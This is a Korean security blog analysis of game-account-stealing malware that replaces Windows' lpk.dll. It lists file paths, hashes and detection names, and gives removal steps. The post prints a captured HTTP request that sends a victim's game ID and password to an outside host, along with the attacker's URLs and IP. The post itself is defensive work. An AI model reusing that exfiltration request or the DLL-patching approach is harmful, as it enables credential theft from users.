본문 바로가기

벌새::Analysis

lpk.dll 시스템 파일을 패치하는 온라인 게임 탈취 악성코드 (2011.5.21)

728x90
반응형
중국에서 국내 온라인 게임 계정 탈취를 목적으로 제작된 악성코드 중에서는 Windows 시스템 파일을 패치(Patch)하는 방식을 많이 이용하고 있습니다.

기존의 comres.dll / imm32.dll / midimap.dll 파일과 더불어 최근에 lpk.dll 시스템 파일을 패치하는 방식이 발견되고 있습니다.

현재 국내에서 감염을 유발하는 방식은 대체로 악의적으로 변조된 국내 인터넷 사이트에 접속하는 시점에서 Internet Explorer 웹 브라우저 취약점, Adobe Flash Player 취약점을 이용한 방식으로 매월 정기적으로 제공되는 Windows 보안 패치 미설치자와 함께 Adobe Flash Player 최신 버전 미사용자의 경우에는 보안 제품의 진단이 이루어지지 않을 경우 자동으로 감염되고 있습니다.

단, 보안 패치가 잘 적용된 PC 환경에서는 보안 제품의 진단 능력에 상관없이 자동 감염이 이루어지지 않으므로 보안 패치의 중요성은 근본적인 문제 해결 방법입니다.

오늘 살펴볼 악성코드 파일(MD5 : 92ea08eb72789eb08acddfd392d8fa95)은 위에서 언급한 취약점을 이용하여 유포가 이루어지고 있는 것으로 추정되며, 감염시 정상적인 lpk.dll 시스템 파일을 패치하여 악용하는 사례입니다.

현재 안철수연구소(AhnLab) V3 보안 제품에서는 Dropper/Win32.OnlineGameHack 진단명으로 진단되며 알약(ALYac) 2.0 보안 제품에서는 Mal/EncPk-CK 진단명으로 사전 차단되고 있습니다.

[생성 파일 등록 / 진단 정보]

C:\WINDOWS\system32\2011521212529.dll :: lpk.dll 백업 파일(정상 파일)
※ 해당 파일은 감염 시간에 따라 파일명이 2011(Random 9~10자리 숫자).dll 패턴으로 생성됩니다.


C:\WINDOWS\system32\lpk.dll :: 변경 전 파일 크기 - 22,016 Bytes / 변경 후 파일 크기 : 33,593,490 Bytes
 - MD5 : FDDE6BE41D554BCDF8001A0F15868D8A

 - AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 5/42)

C:\WINDOWS\system32\lpk32.dll :: lpk.dll 백업 파일(정상 파일)

악성코드 감염시 윈도우 파일 보호(WFP) 기능을 무력화하여 정상적인 lpk.dll 파일을 lpk32.dll 파일로 백업을 하고, 악성 기능을 가진 lpk.dll 파일을 생성하고 있습니다.

 

패치된 lpk.dll 파일은 그림과 같이 중국에서 제작된 것으로 추정되며, 사용자가 웹 브라우저를 이용하여 특정 온라인 게임이 접속하여 로그인을 하는 과정에서 계정 정보(ID, 비밀번호 등)를 외부로 유출하고 있습니다.

참고로 lpk.dll 파일을 패치하면서 생성된 백업 파일(2011(Random 9~10자리 숫자).dll / lpk32.dll)은 그림과 같습니다.

 

 

실제 동작 과정을 살펴보면 사용자가 Internet Explorer 웹 브라우저를 실행할 경우 iexplore.exe 프로세스에 lpk.dll 악성 파일을 추가하며, 원래 정상적인 lpk.dll(Language Pack) 파일의 기능은 백업된 lpk32.dll 파일이 수행하는 것을 확인할 수 있습니다.

해당 악성코드에서는 피망(pmang.com), 메이플스토리(MapleStory), 던전앤파이터 등과 같은 온라인 게임 계정을 표적으로 하고 있으며, 실제 계정 탈취는 사례는 다음과 같습니다.
 
[피망 게임 계정 탈취 예시]

GET /yue/pm/mail.asp?a1=POKE&a3=(사용자 ID)&a4=(사용자 비밀번호) HTTP/1.1
User-Agent: WinInet
Host: www.laiqiana.com
Cache-Control: no-cache

h**p://www.laiqiana.com/y**/df/mail.asp
h**p://www.laiqiana.com/y**/dfofotp/mail.asp
h**p://www.laiqiana.com/y**/pm/mail.asp
h**p://www.laiqiana.com/y**/hg/mail.asp
h**p://www.laiqiana.com/y**/mxd/mail.asp
h**p://www.laiqiana.com/y**/t1/mail.asp
h**p://www.laiqiana.com/y**/mxdofotp/mail.asp

해당 악성코드에 감염된 사용자가 피망 게임에 접속하여 로그인을 시도할 경우 미국(USA)에 등록된 70.39.99.98 IP 주소로 로그인 정보가 유출되며, 해당 정보 수집을 한 범죄자는 사용자에게 금전적 손실을 유발할 것으로 추정됩니다.

이런 악성코드에 대해 수동으로 문제를 해결하기 위해서는 모든 프로그램을 종료한 상태에서 다음과 같은 절차에 따라 진행을 하시기 바랍니다.
 
  1. C:\WINDOWS\system32\lpk.dll 파일 확장자 변경 : (예) lpk.dll-
  2. 시스템 재부팅
  3. 윈도우 파일 보호(WFP) 기능을 통해 자동으로 정상적인 C:\WINDOWS\system32\lpk.dll 파일 생성

해당 절차대로 진행한 후, 생성되었던 파일(2011(Random 9~10자리 숫자).dll / lpk32.dll / lpk.dll-)을 수동으로 삭제하시기 바랍니다.

참고로 문제를 해결한 사용자는 반드시 추가적으로 보안 제품을 통한 정밀 검사, Windows 보안 패치, Adobe Flash Player 최신 버전 사용, 온라인 게임 계정 비밀번호 변경을 하시기 바랍니다.

위와 같이 정상적인 시스템 파일을 패치하는 방식을 통해 악성 파일을 찾기 매우 어려워지고 있으므로, 이런 류의 악성코드에 감염되지 않도록 하기 위해서는 보안 패치를 반드시 정기적으로 체크하여 업데이트하는 습관을 가지시기 바랍니다.

728x90
반응형